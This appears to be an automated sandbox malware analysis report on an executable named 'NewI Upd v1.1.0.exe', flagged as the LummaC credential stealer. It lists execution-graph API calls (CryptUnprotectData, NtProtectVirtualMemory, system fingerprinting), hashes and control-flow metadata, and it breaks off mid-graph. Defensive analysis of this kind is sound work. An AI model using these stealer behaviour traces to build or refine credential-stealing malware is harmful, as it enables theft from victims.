                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lfFs1bTS1CyVWgEDkF4M4CJkNay987edtXhl1oe%2BsG5aCmomFIQd8KfbSR2jiM1msGvEoIdChy%2BAY3%2FEioaYeztGMplnO709g17Kopj%2FsriZeMA2dRGS%2Bk3CVzbAt%2BqaEmc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f85bbf8a86e434f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1738&rtt_var=665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1021&delivery_rate=1629464&cwnd=209&unsent_bytes=0&cid=b610dc698d2f42dd&ts=759&x=0"
                                                                                2024-12-27 02:03:27 UTC54INData Raw: 33 30 0d 0a 71 43 69 42 69 72 37 49 4f 53 33 4a 6c 63 75 30 53 36 6c 6e 2b 76 4e 79 54 64 41 53 77 38 4e 37 35 55 79 35 49 6c 7a 73 2f 76 58 7a 64 51 3d 3d 0d 0a
                                                                                Data Ascii: 30qCiBir7IOS3Jlcu0S6ln+vNyTdASw8N75Uy5Ilzs/vXzdQ==
                                                                                2024-12-27 02:03:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Target ID:0
                                                                                Start time:21:00:55
                                                                                Start date:26/12/2024
                                                                                Path:C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\NewI Upd v1.1.0.exe"
                                                                                Imagebase:0x630000
                                                                                File size:2'757'632 bytes
                                                                                MD5 hash:F186A87680772F195F865CEDAB080B6D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3109623142.000000000196B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3179555778.00000000017B0000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:4.3%
                                                                                  Dynamic/Decrypted Code Coverage:84%
                                                                                  Signature Coverage:53%
                                                                                  Total number of Nodes:406
                                                                                  Total number of Limit Nodes:16
                                                                                  execution_graph 31498 43d843 31499 43dba3 31498->31499 31502 43d440 LdrInitializeThunk 31499->31502 31501 43dc3e 31502->31501 31850 408780 31852 40878f 31850->31852 31851 408b4d ExitProcess 31852->31851 31853 4087a4 GetCurrentProcessId GetCurrentThreadId 31852->31853 31860 408ad0 31852->31860 31854 4087d0 SHGetSpecialFolderPathW 31853->31854 31855 4087cc 31853->31855 31856 4089a0 31854->31856 31855->31854 31856->31856 31857 43bae0 RtlAllocateHeap 31856->31857 31858 408a4f GetForegroundWindow 31857->31858 31858->31860 31860->31851 31503 4186c0 31505 4186d0 31503->31505 31504 4188a2 CryptUnprotectData 31505->31504 31506 43f340 31507 43f360 31506->31507 31508 43f3be 31507->31508 31516 43d440 LdrInitializeThunk 31507->31516 31509 43f5ec 31508->31509 31517 43bae0 31508->31517 31513 43f440 31515 43f4bf 31513->31515 31520 43d440 LdrInitializeThunk 31513->31520 31521 43bb00 31515->31521 31516->31508 31525 43e970 31517->31525 31519 43baea RtlAllocateHeap 31519->31513 31520->31515 31522 43bb13 31521->31522 31523 43bb30 31521->31523 31524 43bb18 RtlFreeHeap 31522->31524 31523->31509 31524->31523 31526 43e980 31525->31526 31526->31519 31526->31526 31527 43bb40 31528 43bb60 31527->31528 31532 43bbae 31528->31532 31537 43d440 LdrInitializeThunk 31528->31537 31529 43bd5d 31531 43bae0 RtlAllocateHeap 31534 43bc20 31531->31534 31532->31529 31532->31531 31533 43bb00 RtlFreeHeap 31533->31529 31536 43bc8f 31534->31536 31538 43d440 LdrInitializeThunk 31534->31538 31536->31533 31537->31532 31538->31536 31539 43d3c0 31540 43d3e6 31539->31540 31541 43d425 31539->31541 31542 43d40b RtlReAllocateHeap 31539->31542 31543 43d41a 31539->31543 31544 43d3d8 31539->31544 31540->31542 31545 43bb00 RtlFreeHeap 31541->31545 31546 43d420 31542->31546 31547 43bae0 RtlAllocateHeap 31543->31547 31544->31540 31544->31541 31544->31542 31545->31546 31547->31546 31548 43d647 31549 43d670 31548->31549 31549->31549 31550 43d6ce 31549->31550 31552 43d440 LdrInitializeThunk 31549->31552 31552->31550 31553 43d546 31554 43d550 31553->31554 31554->31554 31555 43d5d4 GetForegroundWindow 31554->31555 31556 43d5e2 31555->31556 31557 87cf80 31560 87da90 31557->31560 31559 87cf8b 31564 87e730 31560->31564 31563 87dab8 31563->31559 31565 87daa3 GetStartupInfoW 31564->31565 31565->31563 31566 42cac5 31568 42cad1 31566->31568 31567 42cbc4 GetComputerNameExA 31569 42cc1e 31567->31569 31568->31567 31569->31569 31570 43daca 31571 43dae0 31570->31571 31571->31571 31574 43d440 LdrInitializeThunk 31571->31574 31573 43db7c 31574->31573 31575 42da4c 31576 42da70 31575->31576 31576->31576 31577 42db6e 31576->31577 31579 43d440 LdrInitializeThunk 31576->31579 31579->31577 31861 430b0d CoSetProxyBlanket 31862 415b91 31863 415d34 31862->31863 31865 415dc3 31862->31865 31866 415b9d 31862->31866 31863->31865 31868 41c960 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 31863->31868 31867 4403a0 LdrInitializeThunk 31866->31867 31867->31863 31868->31865 31869 42c591 31870 42c5af 31869->31870 31873 4384a0 31870->31873 31874 4384ae 31873->31874 31878 4385f5 31874->31878 31882 43d440 LdrInitializeThunk 31874->31882 31876 42c6a7 31878->31876 31879 43870f 31878->31879 31881 43d440 LdrInitializeThunk 31878->31881 31879->31876 31883 43d440 LdrInitializeThunk 31879->31883 31881->31878 31882->31874 31883->31879 31580 8bf910 31581 8bf930 31580->31581 31583 8bf9a8 31581->31583 31598 8c01a8 31583->31598 31585 8bf9c2 31597 8bfa42 31585->31597 31618 8c0478 31585->31618 31591 8bfa09 31640 8c08b8 31591->31640 31593 8bfa23 31593->31597 31713 8bfff8 31593->31713 31597->31581 31599 8c01b8 31598->31599 31614 8c0260 31598->31614 31600 8bfff8 2 API calls 31599->31600 31599->31614 31601 8c020e 31600->31601 31602 8bfd18 2 API calls 31601->31602 31603 8c0214 NtAllocateVirtualMemory 31602->31603 31604 8c0235 31603->31604 31603->31614 31605 8c0286 31604->31605 31606 8c0247 31604->31606 31607 8bfff8 2 API calls 31605->31607 31608 8bfff8 2 API calls 31606->31608 31609 8c029b 31607->31609 31610 8c025a 31608->31610 31611 8bfd18 2 API calls 31609->31611 31612 8bfd18 2 API calls 31610->31612 31613 8c02a1 31611->31613 31612->31614 31613->31614 31615 8bfff8 2 API calls 31613->31615 31614->31585 31616 8c02c3 31615->31616 31617 8bfd18 2 API calls 31616->31617 31617->31614 31619 8bf9ef 31618->31619 31624 8c049a 31618->31624 31625 8c05b8 31619->31625 31620 8bfd18 2 API calls 31621 8c04ce LoadLibraryA 31620->31621 31621->31624 31622 8bfff8 GetPEB LoadLibraryW 31622->31624 31623 8bfd18 GetPEB LoadLibraryW 31623->31624 31624->31619 31624->31620 31624->31622 31624->31623 31626 8bf9fc 31625->31626 31627 8c05da 31625->31627 31630 8c06e8 31626->31630 31627->31626 31628 8bfff8 GetPEB LoadLibraryW 31627->31628 31629 8bfd18 GetPEB LoadLibraryW 31627->31629 31628->31627 31629->31627 31631 8bfff8 2 API calls 31630->31631 31632 8c0710 31631->31632 31633 8bfd18 2 API calls 31632->31633 31634 8c0716 NtProtectVirtualMemory 31633->31634 31639 8c0745 31634->31639 31635 8c0834 31635->31591 31636 8bfff8 2 API calls 31636->31639 31637 8bfd18 2 API calls 31638 8c0816 NtProtectVirtualMemory 31637->31638 31638->31639 31639->31635 31639->31636 31639->31637 31641 8bfff8 2 API calls 31640->31641 31642 8c08ca 31641->31642 31643 8bfd18 2 API calls 31642->31643 31644 8c08d0 31643->31644 31645 8bfff8 2 API calls 31644->31645 31646 8c08df 31645->31646 31647 8bfd18 2 API calls 31646->31647 31648 8c08e5 31647->31648 31649 8bfff8 2 API calls 31648->31649 31712 8c0c77 31648->31712 31650 8c0911 31649->31650 31651 8bfd18 2 API calls 31650->31651 31652 8c0917 31651->31652 31653 8bfff8 2 API calls 31652->31653 31654 8c0926 31653->31654 31655 8bfd18 2 API calls 31654->31655 31656 8c092c 31655->31656 31657 8bfff8 2 API calls 31656->31657 31658 8c094e 31657->31658 31659 8bfd18 2 API calls 31658->31659 31660 8c0954 31659->31660 31661 8bfff8 2 API calls 31660->31661 31660->31712 31662 8c097f 31661->31662 31663 8bfd18 2 API calls 31662->31663 31664 8c0985 31663->31664 31665 8bfff8 2 API calls 31664->31665 31666 8c099e 31665->31666 31667 8bfd18 2 API calls 31666->31667 31668 8c09a4 31667->31668 31669 8bfff8 2 API calls 31668->31669 31670 8c09c3 31669->31670 31671 8bfd18 2 API calls 31670->31671 31672 8c09c9 31671->31672 31673 8bfff8 2 API calls 31672->31673 31674 8c0a00 31673->31674 31675 8bfd18 2 API calls 31674->31675 31676 8c0a06 31675->31676 31677 8bfff8 2 API calls 31676->31677 31678 8c0a23 31677->31678 31679 8bfd18 2 API calls 31678->31679 31680 8c0a29 31679->31680 31681 8bfff8 2 API calls 31680->31681 31682 8c0a46 31681->31682 31683 8bfd18 2 API calls 31682->31683 31684 8c0a4c 31683->31684 31685 8bfff8 2 API calls 31684->31685 31686 8c0a68 31685->31686 31687 8bfd18 2 API calls 31686->31687 31688 8c0a6e 31687->31688 31689 8bfff8 2 API calls 31688->31689 31690 8c0a7d 31689->31690 31691 8bfd18 2 API calls 31690->31691 31692 8c0a83 31691->31692 31693 8bfff8 2 API calls 31692->31693 31694 8c0aa1 31693->31694 31695 8bfd18 2 API calls 31694->31695 31696 8c0aa7 31695->31696 31697 8bfff8 2 API calls 31696->31697 31698 8c0ab6 31697->31698 31699 8bfd18 2 API calls 31698->31699 31700 8c0abc 31699->31700 31741 8bff68 GetPEB LoadLibraryW 31700->31741 31702 8c0bb1 31703 8bfff8 2 API calls 31702->31703 31704 8c0bd5 31703->31704 31705 8bfd18 2 API calls 31704->31705 31706 8c0bdb 31705->31706 31707 8bfff8 2 API calls 31706->31707 31708 8c0bea 31707->31708 31709 8bfd18 2 API calls 31708->31709 31710 8c0bf0 GetPEB 31709->31710 31710->31712 31712->31593 31714 8c0144 31713->31714 31742 8bfc78 GetPEB 31714->31742 31716 8c0171 31717 8bfa3c 31716->31717 31718 8bfff8 GetPEB 31716->31718 31722 8bfd18 31717->31722 31719 8c0186 31718->31719 31720 8bfd18 GetPEB 31719->31720 31721 8c018c LoadLibraryW 31720->31721 31721->31717 31723 8bfd2b 31722->31723 31740 8bfef5 31722->31740 31724 8bfff8 2 API calls 31723->31724 31723->31740 31725 8bfec7 31724->31725 31726 8bfd18 2 API calls 31725->31726 31727 8bfecd 31726->31727 31728 8bfee3 31727->31728 31729 8bff07 31727->31729 31730 8bfff8 2 API calls 31728->31730 31731 8bfff8 2 API calls 31729->31731 31732 8bfeef 31730->31732 31733 8bff13 31731->31733 31734 8bfd18 2 API calls 31732->31734 31735 8bfd18 2 API calls 31733->31735 31734->31740 31736 8bff19 31735->31736 31737 8bfff8 2 API calls 31736->31737 31738 8bff28 31737->31738 31739 8bfd18 2 API calls 31738->31739 31739->31740 31740->31597 31741->31702 31743 8bfca4 31742->31743 31743->31716 31884 40a720 31885 40a740 31884->31885 31885->31885 31886 40a7fe LoadLibraryExW 31885->31886 31887 40a820 31886->31887 31887->31887 31888 40a8de LoadLibraryExW 31887->31888 31889 42cc22 31890 42cc2e GetComputerNameExA 31889->31890 31892 40e1a0 31893 40e1b0 31892->31893 31896 4388c0 31893->31896 31895 40e2c2 31895->31895 31897 4388f0 31896->31897 31897->31897 31898 438a60 CoCreateInstance 31897->31898 31899 438eb1 31898->31899 31900 438ab4 SysAllocString 31898->31900 31902 438ec5 GetVolumeInformationW 31899->31902 31903 438b5e 31900->31903 31909 438edf 31902->31909 31904 438ea0 SysFreeString 31903->31904 31905 438b6a CoSetProxyBlanket 31903->31905 31904->31899 31906 438e96 31905->31906 31907 438b8a SysAllocString 31905->31907 31906->31904 31910 438c80 31907->31910 31909->31895 31910->31910 31911 438c96 SysAllocString 31910->31911 31913 438cb6 31911->31913 31912 438e83 SysFreeString SysFreeString 31912->31906 31913->31912 31914 438e75 31913->31914 31915 438cfe VariantInit 31913->31915 31914->31912 31917 438d50 31915->31917 31916 438e64 VariantClear 31916->31914 31917->31916 31744 423960 31745 4239b0 31744->31745 31745->31745 31746 423a7e 31745->31746 31748 423b91 31745->31748 31751 4403a0 31745->31751 31746->31746 31747 423d01 GetLogicalDrives 31749 4403a0 LdrInitializeThunk 31747->31749 31748->31746 31748->31747 31748->31748 31749->31746 31752 4403c0 31751->31752 31753 4404fe 31752->31753 31755 43d440 LdrInitializeThunk 31752->31755 31753->31748 31755->31753 31918 427220 31919 427240 31918->31919 31921 42729e 31919->31921 31928 43d440 LdrInitializeThunk 31919->31928 31920 427380 31921->31920 31922 43bae0 RtlAllocateHeap 31921->31922 31925 4272ff 31922->31925 31924 43bb00 RtlFreeHeap 31924->31920 31927 42737e 31925->31927 31929 43d440 LdrInitializeThunk 31925->31929 31927->31924 31927->31927 31928->31921 31929->31927 31930 421420 31931 42142e 31930->31931 31934 421480 31930->31934 31936 421540 31931->31936 31937 421550 31936->31937 31937->31937 31938 4403a0 LdrInitializeThunk 31937->31938 31939 42161f 31938->31939 31940 43de20 31941 43de40 31940->31941 31942 43de9e 31941->31942 31947 43d440 LdrInitializeThunk 31941->31947 31944 43df5e 31942->31944 31946 43d440 LdrInitializeThunk 31942->31946 31946->31944 31947->31942 31948 440620 31949 440640 31948->31949 31949->31949 31951 44069e 31949->31951 31954 43d440 LdrInitializeThunk 31949->31954 31952 44074e 31951->31952 31955 43d440 LdrInitializeThunk 31951->31955 31954->31951 31955->31952 31956 40ca26 CoInitializeEx CoInitializeEx 31957 40cbab CoInitializeSecurity 31959 40e7ad 31965 409960 31959->31965 31961 40e7b5 CoUninitialize 31962 40e7e0 31961->31962 31963 40eb4f CoUninitialize 31962->31963 31964 40eb70 31963->31964 31966 409974 31965->31966 31966->31961 31967 40da2f 31969 40da90 31967->31969 31968 40daee 31969->31968 31971 43d440 LdrInitializeThunk 31969->31971 31971->31968 31977 43fcb0 31978 43fcbf 31977->31978 31979 43fdfe 31978->31979 31987 43d440 LdrInitializeThunk 31978->31987 31980 44001b 31979->31980 31981 43bae0 RtlAllocateHeap 31979->31981 31983 43febd 31981->31983 31985 43ff5e 31983->31985 31988 43d440 LdrInitializeThunk 31983->31988 31984 43bb00 RtlFreeHeap 31984->31980 31985->31984 31987->31979 31988->31985 31761 884a30 31764 89b390 31761->31764 31765 89b3a7 31764->31765 31766 884a44 31764->31766 31765->31766 31770 893ed0 31765->31770 31777 8995c0 31765->31777 31788 89b130 VirtualProtect 31765->31788 31790 89b220 31770->31790 31774 893ef7 31774->31765 31775 893ee9 31775->31774 31794 893f20 FlsFree 31775->31794 31824 898900 EnterCriticalSection 31777->31824 31779 8995f9 31825 898e70 31779->31825 31781 89960e 31782 899615 31781->31782 31833 899340 8 API calls 31781->31833 31835 899633 LeaveCriticalSection std::_Mutex::_Lock 31782->31835 31784 89961c 31834 899470 GetStdHandle GetFileType 31784->31834 31787 899631 31787->31765 31789 89b152 31788->31789 31789->31765 31795 89a850 31790->31795 31793 89ae80 FlsAlloc 31793->31775 31794->31774 31798 89a9c0 31795->31798 31799 89a9f5 __aligned_msize 31798->31799 31800 893eda 31799->31800 31802 89aa40 31799->31802 31800->31793 31812 89ac80 31802->31812 31806 89aa66 VirtualProtect 31809 89aa88 __aligned_msize 31806->31809 31807 89ab35 VirtualProtect 31808 89ab54 31807->31808 31818 898970 LeaveCriticalSection 31808->31818 31809->31807 31811 89ab60 31811->31800 31819 89a970 31812->31819 31815 89aa59 31817 898900 EnterCriticalSection 31815->31817 31816 89aca3 GetProcAddress 31816->31815 31817->31806 31818->31811 31821 89a980 31819->31821 31820 89a9a8 31820->31815 31820->31816 31821->31820 31823 89ab70 4 API calls 2 library calls 31821->31823 31823->31821 31824->31779 31826 898eab 31825->31826 31830 898ef0 31826->31830 31836 898900 EnterCriticalSection 31826->31836 31828 898f80 31846 898fa8 LeaveCriticalSection std::_Mutex::_Lock 31828->31846 31830->31781 31832 898f2e 31832->31828 31837 898cb0 31832->31837 31833->31784 31834->31782 31835->31787 31836->31832 31838 898cca std::_Timevec::_Timevec pre_c_initialization 31837->31838 31839 898ce5 31838->31839 31844 898cfc std::_Mutex::_Lock 31838->31844 31847 882a40 5 API calls pre_c_initialization 31839->31847 31841 898cf4 31841->31832 31842 898dea pre_c_initialization 31849 882a40 5 API calls pre_c_initialization 31842->31849 31844->31842 31848 89af30 InitializeCriticalSectionEx 31844->31848 31846->31830 31847->31841 31848->31844 31849->31841 31989 42d53a 31990 42d545 31989->31990 31990->31990 31991 42d61e GetPhysicallyInstalledSystemMemory 31990->31991 31992 42d660 31991->31992 31992->31992 31993 43dd3a 31995 43d951 31993->31995 31994 43da4e 31995->31994 31997 43d440 LdrInitializeThunk 31995->31997 31997->31994 31998 4364ba 31999 4364e1 31998->31999 32000 436552 31999->32000 32002 43d440 LdrInitializeThunk 31999->32002 32002->31999

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 4388c0-4388e2 1 4388f0-438904 0->1 1->1 2 438906-43891b 1->2 3 438920-438959 2->3 3->3 4 43895b-43899f 3->4 5 4389a0-4389df 4->5 5->5 6 4389e1-4389fd 5->6 8 438a60-438aae CoCreateInstance 6->8 9 4389ff-438a0a 6->9 11 438eb5-438edd call 43ed30 GetVolumeInformationW 8->11 12 438ab4-438ae9 8->12 10 438a10-438a4d 9->10 10->10 13 438a4f-438a59 10->13 18 438ee7-438ee9 11->18 19 438edf-438ee3 11->19 14 438af0-438b33 12->14 13->8 14->14 16 438b35-438b64 SysAllocString 14->16 24 438ea0-438eb1 SysFreeString 16->24 25 438b6a-438b84 CoSetProxyBlanket 16->25 20 438efd-438f04 18->20 19->18 22 438f10-438f2f 20->22 23 438f06-438f0d 20->23 26 438f30-438f6e 22->26 23->22 24->11 27 438e96-438e9c 25->27 28 438b8a-438ba5 25->28 26->26 29 438f70-438fa6 26->29 27->24 30 438bb0-438c02 28->30 32 438fb0-438fcf 29->32 30->30 33 438c04-438c7a SysAllocString 30->33 32->32 34 438fd1-439001 call 41e540 32->34 35 438c80-438c94 33->35 39 439010-439018 34->39 35->35 37 438c96-438cbc SysAllocString 35->37 41 438e83-438e92 SysFreeString * 2 37->41 42 438cc2-438ce4 37->42 39->39 43 43901a-43901c 39->43 41->27 50 438cea-438ced 42->50 51 438e79-438e7f 42->51 44 439022-439032 call 408200 43->44 45 438ef0-438ef7 43->45 44->45 45->20 47 439037-43903e 45->47 50->51 52 438cf3-438cf8 50->52 51->41 52->51 53 438cfe-438d4f VariantInit 52->53 54 438d50-438d7f 53->54 54->54 55 438d81-438d93 54->55 56 438d97-438d99 55->56 57 438e64-438e75 VariantClear 56->57 58 438d9f-438da5 56->58 57->51 58->57 59 438dab-438db9 58->59 61 438dbb-438dc0 59->61 62 438dfd 59->62 64 438ddc-438de0 61->64 63 438dff-438e27 call 408040 call 408fe0 62->63 75 438e29 63->75 76 438e2e-438e3a 63->76 65 438de2-438deb 64->65 66 438dd0 64->66 68 438df2-438df6 65->68 69 438ded-438df0 65->69 71 438dd1-438dda 66->71 68->71 72 438df8-438dfb 68->72 69->71 71->63 71->64 72->71 75->76 77 438e41-438e61 call 408070 call 408050 76->77 78 438e3c 76->78 77->57 78->77
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00438AA6
                                                                                  • SysAllocString.OLEAUT32(b1}3), ref: 00438B3A
                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B7C
                                                                                  • SysAllocString.OLEAUT32(85D58BE5), ref: 00438C09
                                                                                  • SysAllocString.OLEAUT32(85D58BE5), ref: 00438C97
                                                                                  • VariantInit.OLEAUT32(F7F6F5CC), ref: 00438D07
                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,3C903E9C,00000000,00000000,00000000,00000000), ref: 00438ED6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                  • String ID: :$B,kz$\$\]^_$b1}3$d9y;$dE$de$rs$u=s?$u%w
                                                                                  • API String ID: 1810270423-2379762038
                                                                                  • Opcode ID: dfae4a3e18d6b9b166b3523c11d2585180d9e070cc0b6874a744cbf27471fc50
                                                                                  • Instruction ID: 46931f2b0126f14cbb24c49b3dc15b97a9aa1a811eb456b68feded50f1eec2af
                                                                                  • Opcode Fuzzy Hash: dfae4a3e18d6b9b166b3523c11d2585180d9e070cc0b6874a744cbf27471fc50
                                                                                  • Instruction Fuzzy Hash: 54120D72A083009BD310CF65D881B5BBBE5EFC9714F14892EF9949B380DB78D905CB9A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: )&$)37]$/LFN$3['E$4=/U$4=/U$7$9Z$=04v$PE$QB$`E(A$hi$s$wvut$wvut$5B
                                                                                  • API String ID: 0-3477687257
                                                                                  • Opcode ID: 455a8e2786914f071db71330fba20fcd73722c5b98392ed7e6befe84be07cec6
                                                                                  • Instruction ID: eaccbec28639dad66b3d56d9852f65a62ccf378925e15a513df039d31ec1de07
                                                                                  • Opcode Fuzzy Hash: 455a8e2786914f071db71330fba20fcd73722c5b98392ed7e6befe84be07cec6
                                                                                  • Instruction Fuzzy Hash: 8A820EB46083419FD714CF28E89176BBBE1FF86314F58896CE4858B392D739D905CB4A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 288 40e7ad-40e7d8 call 409960 CoUninitialize 291 40e7e0-40e82f 288->291 291->291 292 40e831-40e84f 291->292 293 40e850-40e88c 292->293 293->293 294 40e88e-40e8d5 293->294 295 40e8e0-40e907 294->295 295->295 296 40e909-40e913 295->296 297 40e915-40e91f 296->297 298 40e92b-40e936 296->298 299 40e920-40e929 297->299 300 40e938-40e939 298->300 301 40e94b-40e953 298->301 299->298 299->299 302 40e940-40e949 300->302 303 40e955-40e958 301->303 304 40e96b-40e976 301->304 302->301 302->302 305 40e960-40e969 303->305 306 40e978-40e97f 304->306 307 40e98d 304->307 305->304 305->305 309 40e980-40e989 306->309 308 40e990-40e998 307->308 310 40e99a-40e99f 308->310 311 40e9ab-40e9b7 308->311 309->309 312 40e98b 309->312 313 40e9a0-40e9a9 310->313 314 40e9d1-40ea8f 311->314 315 40e9b9-40e9bb 311->315 312->308 313->311 313->313 317 40ea90-40eabe 314->317 316 40e9c0-40e9cd 315->316 316->316 318 40e9cf 316->318 317->317 319 40eac0-40eada 317->319 318->314 320 40eae0-40eb02 319->320 320->320 321 40eb04-40eb6f call 40b8e0 call 409960 CoUninitialize 320->321 326 40eb70-40ebbf 321->326 326->326 327 40ebc1-40ebdf 326->327 328 40ebe0-40ec1c 327->328 328->328 329 40ec1e-40ec65 328->329 330 40ec70-40ec97 329->330 330->330 331 40ec99-40eca6 330->331 332 40eca8-40ecaa 331->332 333 40ecbb-40ecc9 331->333 334 40ecb0-40ecb9 332->334 335 40ecdb-40ece6 333->335 336 40eccb-40eccf 333->336 334->333 334->334 338 40ece8-40eceb 335->338 339 40ecfb-40ed06 335->339 337 40ecd0-40ecd9 336->337 337->335 337->337 342 40ecf0-40ecf9 338->342 340 40ed08-40ed09 339->340 341 40ed1b-40ed23 339->341 343 40ed10-40ed19 340->343 344 40ed40 341->344 345 40ed25-40ed28 341->345 342->339 342->342 343->341 343->343 347 40ed43-40ed4f 344->347 346 40ed30-40ed39 345->346 346->346 348 40ed3b 346->348 349 40ed51-40ed53 347->349 350 40ed74-40ee2f 347->350 348->347 351 40ed60-40ed6d 349->351 352 40ee30-40ee61 350->352 351->351 353 40ed6f-40ed71 351->353 352->352 354 40ee63-40ee7f 352->354 353->350 355 40ee80-40eea2 354->355 355->355 356 40eea4-40eed9 call 40b8e0 355->356
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Uninitialize
                                                                                  • String ID: 6G9A$OIE;$^Ufa$a]o#$v43$v43$~43$~43
                                                                                  • API String ID: 3861434553-1282255561
                                                                                  • Opcode ID: 53e4e04492eb6f508a03ba9e07f74e14e84f17865fadc37e12a33e463c850893
                                                                                  • Instruction ID: d307ecd3d555fe7f2c60421156369440f60a065389dfa16697d4a3462a20e343
                                                                                  • Opcode Fuzzy Hash: 53e4e04492eb6f508a03ba9e07f74e14e84f17865fadc37e12a33e463c850893
                                                                                  • Instruction Fuzzy Hash: 0B22D2B52047818FD325CF2AC490662BFE2FF96304B1989ADC0D65F792C37AE816CB55

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 359 4237c9-4237e2 360 4237a0-4237ac 359->360 361 4237f0-4237f8 359->361 362 423830-42385e 359->362 363 423816-423829 359->363 364 4237ff-42380f 359->364 365 42352c-423537 359->365 360->359 361->360 361->361 361->362 361->363 361->364 361->365 362->360 362->361 362->362 362->363 362->364 362->365 373 423865-423878 362->373 363->361 363->362 363->365 364->361 364->362 364->363 364->365 366 4235e2-4235ed 365->366 367 4235e0 365->367 368 423540-42354e 365->368 369 423640-423654 365->369 370 423786-42378d 365->370 371 423727-42373f 365->371 372 423584 365->372 365->373 374 423769-42377f 365->374 375 4235ae-4235bc 365->375 376 423590-423595 365->376 377 4235d0-4235d9 365->377 378 423630 365->378 379 423750-423762 365->379 380 423796-42379b 365->380 381 423714-423720 365->381 382 4235f4-423627 365->382 383 423555-42357d 365->383 384 42359e-4235a6 365->384 385 42387c-42388a 365->385 366->368 366->369 366->370 366->373 366->374 366->378 366->379 366->380 366->382 366->385 367->366 368->366 368->367 368->368 368->369 368->370 368->371 368->372 368->373 368->374 368->375 368->376 368->377 368->378 368->379 368->380 368->381 368->382 368->383 368->384 368->385 386 423660-423685 369->386 370->380 371->370 371->373 371->374 371->379 371->380 371->385 387 423aa2-423aae 371->387 388 423a86-423a8c call 408050 371->388 389 423a47-423a4d 371->389 390 423a8f-423a94 371->390 391 423aaf-423ab8 371->391 392 423a7e 371->392 372->376 373->385 374->370 374->373 374->380 374->385 374->387 374->388 374->389 374->390 374->391 374->392 375->368 375->369 375->370 375->373 375->374 375->377 375->378 375->379 375->380 375->382 375->385 376->384 377->367 378->369 379->370 379->373 379->374 379->380 379->385 379->387 379->388 379->389 379->390 379->391 379->392 380->385 381->366 381->367 381->368 381->369 381->370 381->371 381->372 381->373 381->374 381->375 381->376 381->377 381->378 381->379 381->380 381->382 381->384 381->385 381->387 381->388 381->389 